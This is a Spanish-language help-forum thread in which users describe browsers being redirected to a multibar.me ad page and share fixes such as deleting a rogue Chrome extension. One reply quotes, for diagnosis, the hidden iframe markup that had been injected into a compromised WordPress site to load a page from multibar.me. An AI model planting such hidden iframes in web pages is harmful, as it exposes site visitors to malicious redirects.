Virus o troyano "multibar.me"

Resuelto/Cerrado
Oliverivan Mensajes enviados 1 Fecha de inscripción viernes, 18 de octubre de 2013 Estatus Miembro Última intervención viernes, 18 de octubre de 2013 - 18 oct 2013 a las 22:41
 nina - 22 oct 2013 a las 14:53
Hola, tengo un problema que no puedo solucionarlo. Tengo Kaspersky 2013 y no lo detecta.

Cuando abro una pestaña o un link en Chrome (aun no me ha pasado en Explorer, desde donde estoy escribiendo), me dirije a la página correspondiente... y luego de unos pocos segundos, automáticamente pasa a una página de publicidad "http://ww9.js.multibar.me/". No puedo navegar absolutamente nada.
He notado que Facebook y Hotmail me permite abrir sin interrumpir nada, lo que me preocupa más aún.

Alguien puede ayudarme a detectar y borrarlo?

6 respuestas

Yo deshabilite y elimine un plugin que me aparece en extensiones (Herramientas-->Extensiones) llamado Chrome Plugin 1.5 o algo asi, que aparte dice que no fue descargado del sitio de Google Chrome y ya me dejo de ocurrir dicho problema, espero te sirva :)
4
eso sirve a mi me ayudo! muchas gracias
0
Anónimo012 Mensajes enviados 3 Fecha de inscripción viernes, 18 de octubre de 2013 Estatus Miembro Última intervención viernes, 18 de octubre de 2013
18 oct 2013 a las 22:54
Mira si tienes extensiones extrañas en el menú>Herramientas>Extensiones y elimínalas. Mira si tienes programas extraños también.
1
Si buscan en internet hay poco o nada sobre esto, y lo poco que hay es de hace 2 dias como mucho.

en un grupo de google comentaron lo siguiente:

we have a wordpress based website and yesterday this problem first appeared. It took me 3 hours to find out whats up. No wordpress files were modified but somehow we found out that someone had modified texts on pages and inserted there a code "<p><iframe style="display: none;" src="http://multibar.me/plcounter.php" height="240" width="320"></iframe></p>
<p><iframe style="display: none;" src="http://multibar.me/plcounter.php" height="240" width="320"></iframe></p>"
You cannot see this on visula text editor, only by using Text editod. Now, we removed these lines from the texts and everything is OK with that.

Hopefully this helps ;



Yo por mi parte puedo aportar que cuando visito ciertos sitios en mozilla me pasa esto mismo, pero no cuando lo hago con chrome.

Por favor si alguien lo resuelve explique como se resuelve paso a paso, porque no tengo idea de lo que habla este señor

Espero que les haya sido util!
1
Tengo el mismo problema. No afecta Internet Explorer por lo que he podido ver. Yo tengo avast internet security, la versión pagada, y tampoco lo ha detectado. No encuentro ningún tipo de información acerca de este virus.
Yo uso Firefox, pero parece que también afecta Chrome.

Si alguien sabe algún método, por favor, comentarlo.
0

¿No encontraste la respuesta que buscabas?

Haz una pregunta
Mucas gracias.. Hice lo mismo y en principio parace solucionarse. Esperemos que no se reinstale solo como me paso alguna vez con otro problema similar.
0
Hola, nuevamente saludos a todos.
Yo uso Firefox e intente muchas cosas.

Sin embargo, entre todas las cosas que hice, no se me había ocurrido sino hasta hace unos instantes desinstalar completamente Firefox y volverlo a instalar.
Activé la casilla de que se eliminaran TODOS los datos como historial, favoritos, marcadores, sesiones, preferencias de paginas, etc. y hasta el momento no me ha molestado más.

Podrían también intentar esto con algún otro navegador, quizás funcione.

Saludos.
0